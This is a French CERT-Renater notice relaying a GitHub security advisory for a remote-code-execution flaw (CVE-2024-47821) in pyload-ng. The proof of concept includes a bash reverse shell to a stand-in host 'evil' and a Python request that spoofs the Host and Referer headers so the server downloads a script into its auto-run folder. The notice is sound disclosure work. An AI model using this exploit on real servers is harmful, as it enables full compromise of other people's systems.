Ce mail provient de l'extérieur, restons vigilants

=====================================================================

                                 CERT-Renater

                      Note d'Information No. 2024/VULN447
_____________________________________________________________________

DATE                : 28/10/2024

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S): Systems running pyload-ng versions prior to
                                  0.5.0b3.dev87.

=====================================================================
https://github.com/pyload/pyload/security/advisories/GHSA-w7hq-f2pj-c53g
_____________________________________________________________________

Remote code execution by download to /.pyload/scripts using /flashgot
API

Critical
GammaC0de published GHSA-w7hq-f2pj-c53g Oct 25, 2024

Package
pyload-ng (pip)

Affected versions
0.5.0

Patched versions
0.5.0b3.dev87


Description

Summary

The folder /.pyload/scripts has scripts which are run when certain
actions are completed, for e.g. a download is finished. By
downloading a executable file to a folder in /scripts and
performing the respective action, remote code execution can be
achieved. A file can be downloaded to such a folder by changing the
download folder to a folder in /scripts path and using the
/flashgot API to download the file.


Details

Configuration changes

    Change the download folder to /home/<user>/.pyload/scripts
    Change permissions for downloaded files:
        Change permissions of downloads: on
        Permission mode for downloaded files: 0744

Making the request to download files

The flashgot API provides functionality to download files from a
provided URL. Although pyload tries to prevent non-local requests
from being able to reach this API, it relies on checking the Host
header and the Referer header of the incoming request. Both of these
can be set by an attacker to arbitrary values, thereby bypassing
these checks.

Referer header check

def flashgot():
    if flask.request.referrer not in (
        "http://localhost:9666/flashgot",
        "http://127.0.0.1:9666/flashgot",
    ):
        flask.abort(500)
  ...

Host header check for local check

def local_check(func):
    @wraps(func)
    def wrapper(*args, **kwargs):
        remote_addr = flask.request.environ.get("REMOTE_ADDR", "0")
        http_host = flask.request.environ.get("HTTP_HOST", "0")

        if remote_addr in ("127.0.0.1", "::ffff:127.0.0.1", "::1", "localhost") or http_host in (
            "127.0.0.1:9666",
            "[::1]:9666",
        ):
            return func(*args, **kwargs)
        else:
            return "Forbidden", 403

    return wrapper

Once the file is downloaded to a folder in the scripts folder, the
attacker can perform the respective action, and the script will be
executed


PoC

Create a malicious file. I have created a reverse shell

#!/bin/bash
bash -i >& /dev/tcp/evil/9002 0>&1

Host this file at some URL, for eg: http://evil

Create a request like this for the flashgot API. I am using
download_finished folder as the destination folder. Scripts in
this folder are run when a download is completed.


import requests

url = "http://pyload/flashgot"
headers = {"host": "127.0.0.1:9666", "Referer": "http://127.0.0.1:9666/flashgot"}

data = {
    "package": "download_finished",  
    "passwords": "optional_password",  
    "urls": "http://evil/exp.sh",
    "autostart": 1,
}


response = requests.post(url, data=data, headers=headers)

When the above request is made, exp.sh will be downloaded to
/scripts/download_finished folder. For all subsequent downloads,
this script will be run. Sending the request again causes a download
of the file again, and when the download is complete, the script is
run.

I also have a listener on my machine which receives the request from
the pyload server. When the script executes, I get a connection back
to my machine


Screenshots

Download folder
1

exp.sh is downloaded
2

Script is run
3

Reverse shell connection is received
4


Impact

This vulnerability allows an attacker with access to change the
settings on a pyload server to execute arbitrary code and completely
compromise the system


Severity
Critical

9.1/ 10

CVSS v3 base metrics

Attack vector
Network

Attack complexity
Low

Privileges required
High

User interaction
None

Scope
Changed

Confidentiality
High

Integrity
High

Availability
High

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CVE ID
CVE-2024-47821

Weaknesses
CWE-78

Credits

    @anuraagbaishya anuraagbaishya Reporter



=========================================================
+ CERT-RENATER        |    tel : 01-53-94-20-44         +
+ 23/25 Rue Daviel    |    fax : 01-53-94-20-41         +
+ 75013 Paris         |   email:cert@support.renater.fr +
=========================================================